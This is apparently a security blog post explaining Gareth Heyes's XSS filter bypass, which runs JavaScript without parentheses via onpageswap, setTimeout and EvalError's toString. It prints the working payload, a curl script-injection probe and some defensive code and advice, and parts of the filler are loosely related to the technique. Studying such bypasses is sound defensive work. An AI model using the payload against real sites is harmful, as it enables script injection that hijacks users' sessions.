Abuse EvalError, onpageswap, and setTimeout for JS Execution Without Parens

Gareth Heyes, a researcher at PortSwigger Web Security, demonstrates a novel technique to achieve JavaScript execution without parentheses by abusing EvalError, onpageswap, and setTimeout. The method redirects the page to fire onpageswap, borrows EvalError's toString so the event object stringifies to a payload, and lets setTimeout evaluate that string as code.

Exploit Code:


<script> 
onpageswap = setTimeout; 
location = 'x'; 
Event.prototype.toString = EvalError.prototype.toString; 
Event.prototype.name = 'alert\x281\x29'; 
</script>

You Should Know:

How This Exploit Works

1. `onpageswap` Hijacking:

  • The `onpageswap` handler is reassigned to `setTimeout`, so when the page is redirected the browser calls `setTimeout` with the pageswap Event object as its first argument.
    – `location = 'x'` forces a navigation, triggering the event.

2. Error Manipulation:

  • `Event.prototype.toString` is overridden with `EvalError.prototype.toString` (inherited from `Error.prototype.toString`), which returns only the `name` when the object has no `message`.
  • `Event.prototype.name` is set to `'alert\x281\x29'`, i.e. `alert(1)` written with hex escapes so the source contains no literal parentheses; the Event object therefore stringifies to `alert(1)`.

3. Execution Without Parentheses:

  • `setTimeout` stringifies a non-function first argument and evaluates it as code, so the payload runs even where parentheses are blocked (e.g., a filter that rejects `alert(1)`).

Practical Testing

Test this in a controlled environment (e.g., PortSwigger’s Web Security Academy lab):

// Verify whether the prototype override is in place: the default
// Object.prototype.toString gives "[object Object]"; after the override,
// Error.prototype.toString returns the name, so this logs "test".
console.log(Event.prototype.toString.call({ name: 'test' }));

Defensive Measures

  • Content Security Policy (CSP):
    Content-Security-Policy: script-src 'self';
    (without 'unsafe-inline', the inline <script> block above is refused by the browser)

  • Sanitization:
    Use DOMPurify or similar libraries to filter malicious scripts.
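The following is an added example, not code from the PortSwigger write-up or from Undercode. It reproduces the stringification half of the technique in plain Node (using a constructed Event-like object, since the real pageswap Event only exists in a browser), and shows a defensive wrapper that removes the setTimeout-evaluates-strings step the trick depends on.

```javascript
// Error.prototype.toString (the function EvalError.prototype inherits) builds
// "<name>: <message>", but returns just the name when the object has no message.
// An Event never carries a message, so after the override it stringifies to
// exactly Event.prototype.name.
function stringifyAsError(obj) {
  return Error.prototype.toString.call(obj);
}

// Constructed stand-in for what a browser hands to onpageswap: a plain object
// with the overridden name and no message.
function makeEventLike(name) {
  return { name: name };
}

// Defensive wrapper: timers accept real functions only. A browser setTimeout
// given anything else stringifies it and compiles the result as script, which
// is the step that turns the string 'alert(1)' into a call.
function hardenTimers(target) {
  const guard = (original) =>
    function (callback, ...rest) {
      if (typeof callback !== 'function') {
        throw new TypeError('timer callback must be a function, got ' + typeof callback);
      }
      return original.call(this, callback, ...rest);
    };
  target.setTimeout = guard(target.setTimeout);
  target.setInterval = guard(target.setInterval);
  return target;
}

// Returns true when the guarded timer refused a non-function payload.
function timerRefuses(target, payload) {
  try {
    target.setTimeout(payload, 0);
    return false;
  } catch (e) {
    return e instanceof TypeError;
  }
}
```

A guard installed by page script can itself be overwritten by any later script, so it complements a CSP that forbids inline script rather than replacing it.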

Related Linux/Windows Commands for Security Testing

  • Check for XSS Vulnerabilities with curl:
    curl -X POST "http://test.site/search" -d "query=<script>alert(1)</script>" 
    
  • Monitor Network Traffic (Linux):
    tcpdump -i eth0 port 80 -A | grep "script" 
    
  • Windows PowerShell for Log Analysis:
    Get-Content .\access.log | Select-String "<script>" 
    

What Undercode Says

This technique highlights the evolving nature of XSS attacks, where even obscure JavaScript behaviors can be weaponized. Security professionals must stay updated with bypass techniques and enforce strict input validation.

Expected Output:

  • Successful execution of `alert(1)` without parentheses.
  • Detection of prototype pollution in security logs.

Prediction

Future XSS attacks may increasingly leverage lesser-known JS features, requiring advanced sanitization and runtime protection mechanisms.

Reference:

PortSwigger XSS Cheat Sheet

Reported By: Gareth Heyes – Hackers Feeds
